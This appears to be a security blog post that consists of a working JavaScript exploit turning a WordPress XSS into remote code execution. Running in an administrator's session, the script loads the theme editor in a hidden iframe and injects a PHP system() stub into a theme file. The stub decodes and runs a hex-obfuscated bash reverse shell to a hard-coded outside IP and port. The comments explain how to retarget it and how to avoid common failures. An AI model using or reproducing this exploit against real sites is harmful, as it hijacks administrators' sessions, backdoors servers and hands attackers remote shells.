/XSS to RCE escalation

Created Sun, 19 Feb 2023 18:34:51 +0100

WordPress XSS to RCE escalation

// wp-xss2rce.js
// Turning a WordPress XSS into a reverse shell. Prerequisite: the XSS has to fire in the
// browser session of a user who may edit theme files (an administrator, on a site where the
// theme file editor has not been disabled), because the script below simply drives
// wp-admin/theme-editor.php with that user's cookies.
// © Jean Pereira <counterswarm.de>

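// Listener the shell connects back to. These were hard-coded inside the byte
// array below; pulling them out makes retargeting a one-line change.
const listenerHost = `68.183.75.0`
const listenerPort = 9999

// Command the web server ends up running (via PHP system(), see below): an
// interactive bash whose stdin/stdout/stderr are bound to a TCP socket
// towards the listener. /dev/tcp is a bash feature, hence "bash -i".
const shellCommand = `bash -i >& /dev/tcp/${listenerHost}/${listenerPort} 0>&1`

// The same command as an array of ASCII byte values; this is the form the
// rest of the script hex-encodes before handing it to the PHP side.
const exploitPayload = Array.from(shellCommand, c => c.charCodeAt(0))

// CodeMirror position at which the PHP stub is spliced into the target file:
// line 0, character 5 — presumably just after an opening `<?php` (5 chars)
// on the file's first line. Confirm against the file actually targeted.
const payloadStart = 0x00
const reservedBytes = 0x05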

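// Hidden iframe that loads the theme file editor inside the victim's own
// (already authenticated) session, so the edit is made with their cookies.
const localFrame = document.createElement(`iframe`)

// Derive the wp-admin location from a link to site-editor.php on the current
// page. NOTE(review): that link presumably only exists when the admin menu
// shows the site editor entry (block themes); elsewhere the selector returns
// null, so fail with a readable error instead of a bare TypeError.
const siteEditorLink = document.querySelector(`a[href*="site-editor"]`)
if (siteEditorLink === null) {
  throw new Error(`wp-xss2rce: no site-editor.php link on this page; cannot derive the wp-admin URL`)
}

// wp-admin directory including its trailing slash, e.g. https://host/wp-admin/
const adminURL = siteEditorLink.href.split(`site-editor.php`)[0]

// Target file inside the active theme — presumably picked because the theme
// includes it on every request, so the stub runs without visiting anything
// special; confirm for the theme in use. Resolving with URL() avoids the
// `wp-admin//theme-editor.php` double slash that string concatenation produced.
localFrame.src = new URL(`theme-editor.php?file=patterns%2Ffooter-default.php`, adminURL).href
localFrame.style.display = `none`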

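// Fires once the theme editor has loaded inside the hidden frame. Uses the
// CodeMirror instance the editor exposes on its root element to splice a PHP
// stub into the open file, then saves through the editor's own submit button.
localFrame.onload = () => {
  const editorDocument = localFrame.contentDocument
  const editorRoot = editorDocument && editorDocument.querySelector(`.CodeMirror`)
  if (!editorRoot || !editorRoot.CodeMirror) {
    // No editor rendered: file editing disabled, file missing, insufficient
    // capability, or the frame did not land on theme-editor.php at all.
    throw new Error(`wp-xss2rce: no CodeMirror editor found in the theme-editor.php frame`)
  }

  // Command bytes as lowercase hex, two digits per byte. A bare toString(16)
  // gives a single digit for values below 0x10 and would shift every
  // following byte when xxd decodes the string on the server.
  const exploitVector = exploitPayload
    .map(e => `0${e.toString(16)}`.slice(-2))
    .join(``)

  // PHP stub written into the file (the original spelled it with \uXXXX
  // escapes and leaked a stray newline plus indentation into the file; this
  // is the same text without that tail). Server side it expands to
  //   echo <hex> | xxd -r -p | bash
  // since 62617368 is "bash": system() runs /bin/sh, which has no /dev/tcp,
  // so the command is handed to bash explicitly. Presumably both parts are
  // hex so that neither the command nor "bash" appears literally in the saved
  // file. Needs xxd on the server (ships with vim, absent on some minimal
  // images) and system() not listed in PHP's disable_functions.
  const phpStub =
    `\r\nsystem("echo ${exploitVector}|xxd -r -p|$(echo 62617368|xxd -r -p)")\r\n`

  editorRoot.CodeMirror.getDoc().replaceRange(phpStub, {
    line: payloadStart,
    ch: reservedBytes
  })

  // One-shot: should saving navigate the frame instead of completing through
  // the editor's own AJAX path, load would fire again and the stub would be
  // inserted and submitted over and over.
  localFrame.onload = null

  const saveButton = editorDocument.querySelector(`.submit input[type="submit"]`)
  if (!saveButton) {
    throw new Error(`wp-xss2rce: theme editor save button not found`)
  }
  saveButton.click()
}

// Attaching the frame to the page starts the load that drives everything above.
document.body.appendChild(localFrame)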